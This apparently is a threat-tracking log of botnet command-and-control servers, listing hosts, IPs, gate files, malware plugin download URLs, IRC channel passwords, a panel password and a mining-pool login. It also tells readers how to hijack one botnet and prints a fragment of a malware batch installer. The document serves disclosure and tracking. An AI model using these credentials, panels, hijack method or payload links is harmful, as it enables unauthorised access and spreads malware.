Resolved zqpoetyafw.org to 108.63.14.21
Server: zqpoetyafw.org
Port: 20001
Note: Not an irc. Don’t waste your time trying to connect.
This is one of snk’s bots. It’s being loaded from his irc.
* Topic for #load is: !j -c RU,RUS #r2 !j #xtp !dl hxxp://hotfile.com/dl/178567859/27b7e85/41aa2c2d8.html
* Topic for #load set by lol at Mon Nov 05...
mirror.serverhalflife.com (Pandora http bot hosted by Netherlands Haarlem Leaseweb B.v.)
Resolved mirror.serverhalflife.com to 95.211.209.178
Pandora ddos bot
Server: mirror.serverhalflife.com
Gate file: /pando/?u=17b6n82405v5ycal3ks4bb7i655e088m
Other crap on the server
Microworm panel: mirror.serverhalflife.com/micro/
The password is “root”
Files are located at hxxp://mirror.serverhalflife.com/files/
blackdra.exe is blackshades
Connects to own3d-private.no-ip.org:4010
Blackshades downloads more of the files
x0x0.294.24.10.10.0.2.15.0.0.0.Federal-Agent.FBI-PC.1.Microsoft Windows XP .522.0.5.0.58802054.0.new.November 4, 2012.Hide My Ass Vpn FBI access panel (Welcome Agent...
vvv.exp1oit.in (Andromeda http hosted by France Roubaix Ovh Sas)
Resolved vvv.exp1oit.in to 178.33.241.61
This is the new andromeda of the French guy. It is the full version with all of the plugins.
Server: vvv.exp1oit.in
Gate file: /google/image.php
Plugins:
Formgrabber: beautyoftheworld.ca/xs/f.pack
Gate file: /google/fg.php
Socks: beautyoftheworld.ca/xs/s.pack
Rootkit: beautyoftheworld.ca/xs/r.pack
Downloads files from hxxp://jamboproducciones.com/xs/ and hxxp://ez-cs.net/dk/
He also has a new smoke loader up
Server: smk.cheatgame.org
Gate...
ultimatecore.info (Andromeda http bot hosted by Ukraine Ukrainian Internet Names Center Ltd)
Resolved ultimatecore.info to 91.231.84.114
New andromeda from this guy.
Server: ultimatecore.info
Gate file: /mario/root.php
This is the full version of andromeda, with all of the plugins.
Plugins:
Formgrabber plugin: ultimatecore.info/test/f.pack
Gate file: /mario/fg.php
Socks plugin: ultimatecore.info/test/s.pack
Rootkit plugin: ultimatecore.info/test/r.pack
Hosting infos: http://whois.domaintools.com/91.231.84.114
Edit: Plugins are now at ultimatecore.info/samuelkaptioalpha1/
I think you can guess what each...
paradoxunirc.no-ip.biz (Barracuda irc bot hosted by Turkey Istanbul Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti.)
Resolved paradoxunirc.no-ip.biz to 176.53.119.14
Server: paradoxunirc.no-ip.biz
Port: 4667
Channel: #yoloswag
Owner: Paradoxun
This is the latest irc of the barracuda .net irc bot. After trolling around for a bit, it’s time for this one to be posted. The Authost on the bot only checks for the nick, so just wait for Paradoxun to leave, /nick...
supervids.net (Lilyjade script hiding behind/proxied by cloudflare)
I was looking at some of the files being installed from a recent posting, when I found something interesting. It looks like someone else is trying out lilyjade. The extensions are held in a self extracting archive and installed via a batch file.
@echo off
//Kill Proccess
TASKKILL /F /IM firefox.exe
TASKKILL /F /IM chrome.exe...
amazinghost.lt, yahgodz.com (Smoke and Andromeda loaders hosted by Netherlands Maasdijk Worldstream)
I happened to notice some people talking about one of mystical’s old domains, indicating that it had been sold. I decided to check out the domains I had listed in the blog post to see what was on them. I found something new on 307dice.com
Smoke loader
Server: 307dice.com
Gate file: /cp/index.php
Check out 307dice.com/cp/guest.php...
cheatmodernwarfare.com (Multiple http bots hosted by Romania Torben Diehr)
Posting some French heckers stuff
Andromeda loader
Server: cheatmodernwarfare.com
Gate file: /xbox/image.php
Rootkit plugin: hxxp://magnatesmobileapps.com/sym/r.pack
Socks plugin: hxxp://magnatesmobileapps.com/sym/s.pack
Backup domains:
down4life.hopto.org
explosiontaracesavatoutdechirer.chickenkiller.com
fckd330.mooo.com
kbot
Server: h4r3.hopto.org
Redirects to: kb.itprosolutions.org
Gate file: /joomla/gate.php
Server: purenet.hopto.org
Redirects to: 91.234.105.14
Gate file: /kb/gate.php
Server: smk.cheatgame.org
Gate file: /kb/gate.php
Smoke loader (Currently down)
Server: smk.cheatmodernwarfare.com
Gate file: /s2/control.php
Hostbooter...
chat.barracudasec.com (Barracuda ircbotnet hosted by Luxembourg Luxembourg Root Sa)
Resolved chat.barracudasec.com to 94.242.204.181
Server: chat.barracudasec.com
Ports: 1337,4667 (bots connect on 4667)
Channel: #xxploasion
Channel password: Rebels2012
Channel: #hflove
Channel password: inspiron
Connects using the no-ip hflove.no-ip.org
Channel: #gavin0hanson
Channel password: hanson911
Channel          Users   Topic
#xxploasion      4       [+sntu]
#hflove          45      [+s]
#gavin0hanson    53      [+sntu]
This irc server is similar to cmjc.whhcd.info in that is it...
planetstat2324.su (smoke loader http bot hosted by Poland Artnet Spolka Z Ograniczona Odpowiedzialnoscia)
This is the http loader for the gold installs ppi program.
Resolved planetstat2324.su to 178.255.43.67
Server: planetstat2324.su
Gate file: /gamenew/index.php
Downloads files from ap2producoes.com/images/
minsabdedf.exe bitcoin miner
pool info: http://hernyoooo@ymail.com:Bazdmeg1@pool.50btc.com:8332
ginamdasm.exe
The file botnet owners are given installs smoke from hxxp://oroihfdbbnennm.in/update/0pdat3.exe
Install statistics are then recorded by oroihfdbbnennm.in/activation.php
Using the format activation.php?productid=(userid)&serial=(long string)
Hosting infos:...